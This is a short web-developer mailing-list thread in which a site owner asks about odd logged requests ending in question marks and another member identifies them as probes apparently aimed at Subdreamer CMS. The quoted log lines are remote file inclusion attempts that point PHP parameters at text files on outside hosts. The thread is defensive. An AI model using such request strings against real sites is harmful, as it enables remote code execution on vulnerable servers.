Loading ...
Sorry, an error occurred while loading the content.

Re: [HTML-on-the-WEB] Strange ?? files

Expand Messages
  • Thomas Hruska
    ... The ending question marks are probably some exploit that bypasses internal checks of specific pages. That is, the scripts advanced2.php and middle.php
    Message 1 of 4 , Apr 1 2:27 AM
    • 0 Attachment
      Bob wrote:
      > I keep getting attempts to load files into my pages in the usual way.
      > They are just pure guesses to files that I don't have.
      >
      > /advanced2.php?pluginpath[0]=http://test10.digitalis.com.pa/cache/id.txt??
      > /middle.php?file=http://www.col.fr/img/xpll.txt?
      >
      > But, why do the file extensions end with either 1 or 2 question marks?
      > Is it to stop me tracing back and seeing what is in those files?
      >
      > It's not my error logs they are adding them, as only a few are like this.
      > Obviously, don't anyone try to trace them, as it could be something nasty.
      > Bob.

      The ending question marks are probably some exploit that bypasses
      internal checks of specific pages. That is, the scripts advanced2.php
      and middle.php aren't properly written to handle them.

      Based on a Google Code Search, I'd say they are targeting:

      http://www.subdreamer.com/

      --
      Thomas Hruska
      CubicleSoft President
      Ph: 517-803-4197

      *NEW* MyTaskFocus 1.1
      Get on task. Stay on task.

      http://www.CubicleSoft.com/MyTaskFocus/
    • Bob
      ... From: Thomas Hruska ... Thanks Thomas, I didn t find much on google about ?? I tried to create a file called id.txt?? but couldn t, so I m assuming
      Message 2 of 4 , Apr 1 5:08 AM
      • 0 Attachment
        ----- Original Message -----
        From: "Thomas Hruska"
        > The ending question marks are probably some exploit that bypasses
        > internal checks of specific pages. That is, the scripts advanced2.php
        > and middle.php aren't properly written to handle them.
        >
        > Based on a Google Code Search, I'd say they are targeting:
        >
        > http://www.subdreamer.com/

        Thanks Thomas, I didn't find much on google about "??"
        I tried to create a file called "id.txt??" but couldn't, so I'm assuming they are just added on.
        I have to be careful with php as register_globals are turned on, and I don't have access to the php.ini.
        I test with error_reporting(E_ALL) which warns of any undefined variables, then use error_reporting(0) for the final, in case they deliberately try to cause any error to reveal something.
        Bob.
      • Thomas Hruska
        ... The extra ? marks are likely something the scripts advanced2.php and middle.php aren t/weren t prepared to handle. Unless you use the Subdreamer CMS
        Message 3 of 4 , Apr 1 6:35 PM
        • 0 Attachment
          Bob wrote:
          > ----- Original Message -----
          > From: "Thomas Hruska"
          >> The ending question marks are probably some exploit that bypasses
          >> internal checks of specific pages. That is, the scripts advanced2.php
          >> and middle.php aren't properly written to handle them.
          >>
          >> Based on a Google Code Search, I'd say they are targeting:
          >>
          >> http://www.subdreamer.com/
          >
          > Thanks Thomas, I didn't find much on google about "??"
          > I tried to create a file called "id.txt??" but couldn't, so I'm assuming they are just added on.
          > I have to be careful with php as register_globals are turned on, and I don't have access to the php.ini.
          > I test with error_reporting(E_ALL) which warns of any undefined variables, then use error_reporting(0) for the final, in case they deliberately try to cause any error to reveal something.
          > Bob.

          The extra '?' marks are likely something the scripts advanced2.php and
          middle.php aren't/weren't prepared to handle. Unless you use the
          Subdreamer CMS product, you have nothing to worry about.

          --
          Thomas Hruska
          CubicleSoft President
          Ph: 517-803-4197

          *NEW* MyTaskFocus 1.1
          Get on task. Stay on task.

          http://www.CubicleSoft.com/MyTaskFocus/
        Your message has been successfully submitted and would be delivered to recipients shortly.